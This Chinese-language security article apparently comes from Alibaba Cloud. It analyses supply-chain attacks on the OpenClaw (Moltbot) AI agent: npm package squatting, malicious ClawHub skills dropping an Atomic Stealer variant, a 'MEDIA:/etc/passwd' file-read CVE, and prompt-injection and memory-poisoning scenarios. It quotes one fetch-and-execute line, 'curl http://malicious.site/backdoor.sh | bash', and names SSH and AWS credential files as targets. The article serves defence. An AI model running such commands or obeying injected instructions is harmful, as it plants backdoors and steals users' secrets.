序言:重塑风险边界
虽然Clawdbot改名为OpenClaw (Moltbot),但是本质未变,并伴随事件的最新发酵,从一个“漏洞”演变为对于Agent生态系统的供应链攻击。攻击者不再直接攻击模型,而是渗透任务自动化链条与依赖模块。这种攻击通过破坏信任传递机制,使上游组件的污染迅速蔓延至整个Agent网络。
在架构层面,Agent的安全性由执行环境 (Runtime) 与组件库 (Skills) 的信任链决定。对于Runtime安全来说,沙箱隔离、Token授权及通信控制是约束恶意指令的最后防线。对于Skills信任来说,外部能力的签名验证与依赖审计决定了调用是否可信。
一旦该信任链条断裂,恶意代码即可通过合法调用实现远程执行,导致Agent从内核决策到行为逻辑全面失控。
技术解析:AI Agent 攻击面蔓延
影子分身:Moltbot NPM 包抢注事件
由于Anthropic提出商标侵权投诉,项目方紧急将Clawdbot更名为 Moltbot。在更名过程中,项目维护者虽更新了文档和GitHub组织名称,但未能在npm(Node.js 包管理器)上及时注册moltbot包名,导致出现了一个短暂的“安全真空期”。攻击者监控到了项目的更名公告,迅速在npm官方仓库注册了名为moltbot的虚假官方包,其初始版本没有包含明显的恶意负载,旨在先通过安全扫描并获取用户信任(及安装量),从而可以在后续的更新推送中植入恶意代码。
致命能力:恶意 Skill 库的“木马化”
OpenClaw允许用户通过“Skills”(技能)来进行扩展功能。而ClawHub 是一个专为OpenClaw用户设计的Skill平台,旨在帮助用户便捷地查找和安装第三方技能。截至2月3日,安全研究人员发现了一起针对ClawHub的大规模供应链投毒事件“ClawHavoc”,经审计发现ClawHub上2857个技能中有341个包含恶意代码,其中约有341个恶意技能都来自于同一个组织。
以其中一个恶意Skill为例,coding-agent-sjf 的SKILL.md如下:
当Mac OS用户安装使用该SKILL,将会执行如图红框中的恶意指令,将其Base64解码后可以发现,会通过HTTP协议从远程服务器下载并执行
而针对该恶意文件进一步分析,可知其为Atomic Stealer木马的一个变种,在感染用户Mac机器后该木马将在隐藏在后台持续地收集用户的各类敏感信息,例如浏览器密码、钱包密钥等等。
基础坍塌:核心组件 CVE 披露
除了软件供应链攻击以及针对AI Agent的Skill投毒,AI Agent自身的基础安全问题也不容小觑。除了1月23日披露的由于反向代理配置导致的未授权访问外,安全研究人员陆续披露了关于OpenClaw的多个CVE漏洞。
以CVE-2026-25475 OpenClaw MEDIA文件读取漏洞。在存在漏洞版本的OpenClaw中,src/media/parse.ts在对路径进行解析时存在如下代码:
当攻击者诱使OpenClaw输出MEDIA:/etc/passwd的文字时,函数isValidMedia返回true,从而可以进一步读取/etc/passwd并将结果返回给攻击者,当然攻击者可以读取OpenClaw所在机器上的任意文件,包括各类账号密码、密钥等。
技术洞察:Agent 安全的“四大盲区”
盲区一:过度依赖 Agent 内生安全能力
核心误区: 默认Agent具备自行分辨恶
深度解析:
OpenClaw的设计理念是赋予LLM“动手能力”,使其能自主调用系统命令、执行脚本甚至修改本地文件。许多用户和开发者想当然地认为,底层的大语言模型(如 Claude、GPT-4)足够“聪明”,能够识别恶意代码并拒绝执行。然而,这种假设在实践中被反复证伪。
安全研究人员演示过一个场景:用户请求OpenClaw“帮我写一个清理临时文件的脚本”,攻击者通过污染的网页或文档注入隐藏指令后,Agent返回的脚本中悄然夹带了curl http://malicious.site/backdoor.sh | bash。由于OpenClaw默认配置对生成代码不做语义级安全审查,此类命令可被直接执行,在用户毫无察觉的情况下植入持久化后门。
盲区二:忽视Agent 身份安全问题
核心误区:缺乏对Agent运行时的身份校验机制,导致冒充、劫持风险。
深度解析:
AI Agent作为用户的“数字代理”,通常被授予访问邮件、云盘、内网服务甚至银行账户的权限。然而,许多部署方案忽视了Agent本身的身份认证与会话保护问题。
一旦Agent身份被劫持,攻击者可以:
以用户身份发送邮件、访问Google Drive/Dropbox等云服务;
读取本地敏感文件(如.ssh/id_rsa, .aws/credentials);
在内网中横向移动,利用Agent被授予的VPN/内网访问权限渗透企业系统。
盲区三:轻视Agent 供应链安全
核心误区:未验证直接使用第三方工具与模型,引入后门。
深度解析:
OpenClaw的生态系统依赖于ClawHub——一个类似于npm或PyPI的技能市场,用户可从中安装各种扩展功能。然而,这一生态已成为供应链攻击的重灾区。
根据The Hacker News和eSecurity Planet2026年2月的报道,安全研究人员对ClawHub上的2,857个Skill进行审计,发现:
341个Skill包含恶意功能,包括窃取浏览器Cookie、记录键盘输入、外泄云服务凭证;
这些恶意Skill伪装成“效率工具”、“系统优化”、“社交媒体管理”等功能诱骗用户安装;
部分Skill采用动态代码加载技术:初始版本无恶意行为,通过后续更新或远程加载注入后门,逃避初次审核;
而未经验证直接使用ClawHub上的第三方Skills,则可能会引入恶意的 Skill,导致风险。
盲区四:忽视Agent 数据污染风险
核心误区:RAG与记忆录入缺失校验,导致间接提示词注入风险。
深度解析:
OpenClaw作为重度依赖检索增强生成(RAG)和持久化记忆的Agent,会不断从用户对话、外部文档、网页内容中学习。这一特性使其成为间接提示词注入(Indirect Prompt Injection)和记忆污染(Memory Poisoning)攻击的理想目标。
根据eSecurity Planet报道,Zenity研究人员展示了如何通过间接提示词注入将OpenClaw变成“持久化后门”——无需利用任何软件漏洞:
1.攻击者上传一份包含隐藏指令的PDF(如 );
2.
3.OpenClaw将该PDF内容索引进RAG知识库;
4,当用户后续询问相关话题时,Agent“回忆”起污染数据,自动执行预埋的恶意命令;
防御范式:阿里云为用户构建AI原生防护力
AI资产指纹识别与供应链全景透视
防护思路:建立针对AI Agent生态(如NPM、PyPI、Hugging Face)的实时资产测绘能力。
全面风险点检查(代理方案+无代理方案)
防护思路:建立针对AI资产的全方位场景风险点检查能力。
从Clawdbot的早期风险暴露到OpenClaw所揭示的系统性隐患,AI Agent供应链安全已进入深水区。通过重塑边界、识别盲区、构建原生防护力,可以应对三重生态风险,推动AI代理在可信轨道上持续演进。
